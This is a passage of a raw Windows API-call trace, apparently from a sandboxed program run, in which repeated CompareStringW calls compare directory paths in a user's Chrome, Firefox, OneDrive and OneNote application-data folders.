Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\", cchCount2=139) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\", cchCount2=139) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\", cchCount2=139) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount1=125, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tg-cyrl\\", cchCount2=78) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tg-cyrl\\", cchCount2=78) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tg-cyrl\\", cchCount2=78) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tg-cyrl\\", cchCount2=78) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tg-cyrl\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount1=60, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 2 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 3 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 1 [0301.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount1=125, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tg-cyrl\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tg-cyrl\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tg-cyrl\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount1=60, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount1=125, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount2=70) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount2=70) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount2=70) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount2=70) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount2=73) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qut-latn\\", cchCount1=79, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount2=73) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tg-cyrl\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount2=73) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount2=73) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount2=75) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount2=75) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount2=75) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount2=75) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount1=75, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 3 [0301.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 2 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount1=75, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\", cchCount2=126) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, 